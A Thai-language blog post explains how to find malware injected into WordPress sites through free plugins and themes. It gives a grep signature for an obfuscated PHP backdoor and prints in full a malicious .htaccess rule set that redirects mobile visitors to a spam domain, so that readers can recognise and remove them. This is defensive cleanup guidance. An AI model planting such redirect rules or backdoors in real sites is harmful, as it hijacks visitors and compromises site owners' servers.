Hacking wordpress and how to track back

Hacking wordpress and how to track back
ปกติถ้าใครใช้งาน Website ที่เป็น wordpress จะมีการใช้งาน plugin free หรือ theme ที่ฟรีนั้น
บางครั้งเขาเปิดให้โหลดใช้งานฟรีๆ แต่ลึกๆแล้วจะทราบได้อย่างไรว่า ของฟรีเหล่านั้น จะปลอดภัยจริงๆ
บางที มีการแทรกโคดที่เป็น malware โคดมาใน wordpress plugin ต่างๆ แล้วสคิป malware นั้นทำการส่งเมลสแปมออกไปบ้าง ทำให้ IP เครื่องเซิฟเวอร์โดน Blacklist หรือโดนวางสคิป ไปยิงเว็บคนอื่นบ้าง กว่าจะรู้ก็จัดหนักไปแล้ว
วันนี้เลยอยากมาแนะนำทริปดีๆ ในการค้นหา Code malware เหล่านั้นดูครับ

20081223111620_img_8737

##ค้นหาพวก PHP code ในการทำ backdoor

ค้นหาพวก script hack ใน wordpress
#cd /var/www/html
#grep -R 'strrev("tress\x61");' 

##โดนฝั่งสคิปใน .htaccess แก้ไขยังไง
จะทำให้เวลาเข้าเว็บผ่านมือถือ แล้วโดน redirect ไปเว็บแปลกๆ เช่น mobile.googleadservices.at 

RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|IOS|Ios|Ipad|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile.googleadservices.at [L,R=302]

##โดนแทรกสคิปในหน้า widget แก้ไขยังไง
ให้ลองเข้าผ่าน browser “firefox” แล้วใช้ตัว firefox debugger > ตัวตรวจสอบ
เกิดจากตัว theme มีจุดรั่วให้สามารถอัฟพวก iframe ฝั่งเข้ามาในระบบได้
วิธีการคือเชคcode ใน menu “widget” > “Text” ของ theme นั้นๆ แล้วทำการค้นหาดู code “googleads” , “youtube” หลังจากเจอก็ทำการลบ code ดังกล่าว แล้วทำการ save


Add A Comment

Your email address will not be published. Required fields are marked *